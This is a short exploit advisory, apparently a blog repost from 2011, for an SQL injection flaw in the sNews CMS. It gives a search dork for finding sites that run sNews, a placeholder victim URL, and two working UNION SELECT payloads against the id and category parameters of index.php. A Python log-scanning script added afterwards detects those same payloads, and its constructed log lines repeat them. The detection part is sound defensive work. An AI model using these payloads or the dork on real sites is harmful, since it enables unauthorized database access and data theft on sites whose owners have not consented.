Monday, April 4, 2011


sNews (index.php) SQL Injection Vulnerability

# Software Link: http://snews.awddesign.co.uk
# Version: N/A
# Tested on: Windows XP SP2
# CVE : N/A
Dork:
"Powered by sNews"

===================================================

[+] Vulnerable File :

http://www.Victime.com/sNews/index.php?id=

[+] ExploiT :

-82/**/union/**/select/**/1,concat%28published,0x3a,name%29,3,4,5,6,7,8,9,10,11+from+categories--

http://localhost/[path]/index.php?category=-3 union select 0,version(),2,3,4,5,6,7,8

====================================================

Reference: Inj3ct0r.com
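
Detection logic for the two requests above, added here as an example (it is not part of the original advisory or of sNews): it scans web-server access logs for UNION SELECT in the id and category parameters of index.php, decoding percent-encoding and stripping /**/ comments first, because a plain substring match on "union select" misses the first payload. The log lines are constructed, and treating both parameters as integers is an assumption drawn from the numeric values in the advisory's requests.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: both parameters named in the advisory normally carry plain integers.
NUMERIC_PARAMS = {"id", "category"}
SQL_COMMENT = re.compile(r"/\*.*?\*/", re.S)   # inline comments used in place of spaces
UNION_SELECT = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def classify(value):
    """Return None for a clean integer, otherwise a short reason string."""
    if re.fullmatch(r"\d+", value):
        return None
    normalized = SQL_COMMENT.sub(" ", value)
    if UNION_SELECT.search(normalized):
        return "union-select"
    return "non-integer"

def scan(lines):
    """Return (line_number, parameter, reason) for each suspicious index.php request."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.endswith("/index.php"):
            continue
        # parse_qsl percent-decodes each value and turns '+' into a space
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            if key in NUMERIC_PARAMS:
                reason = classify(value)
                if reason:
                    hits.append((n, key, reason))
    return hits

# Constructed access-log lines; client addresses are from a documentation range.
SAMPLE_LOG = [
    '192.0.2.10 - - [04/Apr/2011:10:00:01 +0000] "GET /sNews/index.php?id=12 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [04/Apr/2011:10:00:02 +0000] "GET /sNews/index.php?id=-82/**/union/**/select/**/1,concat%28published,0x3a,name%29,3,4,5,6,7,8,9,10,11+from+categories-- HTTP/1.1" 200 4891',
    '192.0.2.44 - - [04/Apr/2011:10:00:03 +0000] "GET /sNews/index.php?category=-3%20union%20select%200,version(),2,3,4,5,6,7,8 HTTP/1.1" 200 4730',
    '192.0.2.77 - - [04/Apr/2011:10:00:04 +0000] "GET /sNews/index.php?category=news HTTP/1.1" 200 5000',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```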
